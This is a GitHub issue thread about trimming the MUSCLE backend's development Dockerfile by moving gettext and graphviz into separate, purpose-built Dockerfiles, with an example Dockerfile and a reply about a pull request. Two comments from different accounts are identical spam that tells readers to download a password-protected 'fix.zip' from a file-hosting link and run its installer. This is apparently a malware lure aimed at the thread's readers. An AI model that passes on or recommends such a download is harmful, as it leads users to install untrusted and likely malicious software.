### ISSUE TITLE
Suggestion: remove requirements for gettext and graphviz for testing

### ISSUE THREAD

**Issue by BeritJanssen** [Amsterdam-Music-Lab/MUSCLE#1230]
Right now, we have a pretty heavy backend `Dockerfile(Develop)` which installs
- ffmpeg
- gettext
- graphviz
- graphviz-dev

Arguably, only the first requirement is necessary at *runtime* (it's used by the `audioread` library, which is used when uploading sections through the admin interface). The other three requirements will only be used incidentally: `gettext` when we need to compile translations; `graphviz(-dev)` to visualize the data model for documentation purposes.

Would it be possible to build dedicated Dockerfiles with inbaked commands for the compile / graphviz scenarios?

For instance, could we do something along those lines:
```
FROM ghcr.io/amsterdam-music-lab/muscle-backend:latest AS backend
RUN apt-get install -y graphviz graphviz-dev
RUN pip install pygraphviz
COPY customsettings.py /server
ENTRYPOINT ['python', 'manage.py', 'graph_models', '-a', '-g', '-o', 'muscle-db-schema.png']
```

`customsettings.py` would inherit the dev settings, but override the `DATABASES` to use sqlite, and add the `GRAPH_MODELS` setting.

We could keep such a Dockerfile in a subdirectory of the scripts folder, along with the settings, and then `docker build` / `docker run` would execute the command.

Alternatively, we could also make .sh scripts which add the libraries and do the pip install, perhaps editing the settings inline.

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by drikusroor** [comment]
@BeritJanssen I've created a PR for this in #1242. 

I also saw this line you proposed:

`FROM ghcr.io/amsterdam-music-lab/muscle-backend:latest AS backend`

Does this (already) work and can we already do this?
